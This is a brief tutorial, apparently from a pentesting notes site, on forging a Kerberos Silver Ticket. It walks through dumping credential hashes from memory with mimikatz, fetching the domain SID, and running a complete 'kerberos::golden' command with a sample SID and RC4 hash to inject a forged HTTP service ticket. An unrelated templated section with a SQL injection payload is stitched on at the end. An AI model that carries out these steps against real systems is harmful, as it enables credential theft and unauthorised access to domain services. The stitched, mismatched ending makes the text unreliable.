Silver Ticket
About The Attack
A Silver Ticket is a forged Kerberos service ticket (TGS) for a specific service.
- Unlike a Golden Ticket (which forges TGTs and gives domain-wide access), a Silver Ticket only works for one service on one machine.
- But it’s much stealthier because it doesn’t involve the Domain Controller (DC) at all. Once you forge the ticket, authentication happens directly between you and the target service.
Pre Requsites
We need below information to perform the attack
- SPN password hash
- Domain SID
- Target SPN
- Privileged access to a domain machine
How to perform the attack
Extract Hash
we need hash of the SPN that we want to create Silver Ticket For
privilege::debug
sekurlsa::logonpasswords
From the above command we can select the service
Fetch SID
We need the Domain SID for silver ticket, We will ignore RID of the user from the command Result
whoami /user
Use Mimikatz
now use mimikatz to forge a silver ticket for the service, in below command we have considered a webservice.
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:domain.com /ptt /target:web.domain.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:UserName
Verify Ticket
We can use powershell to validate if the ticket has been added in the list
klist
🚀 Launch Sequence (How-To)
Here’s how the magic happens — step by step.
# Example flow:
1. Identify the injection point
2. Craft payload: ' OR '1'='1
3. Send request and observe results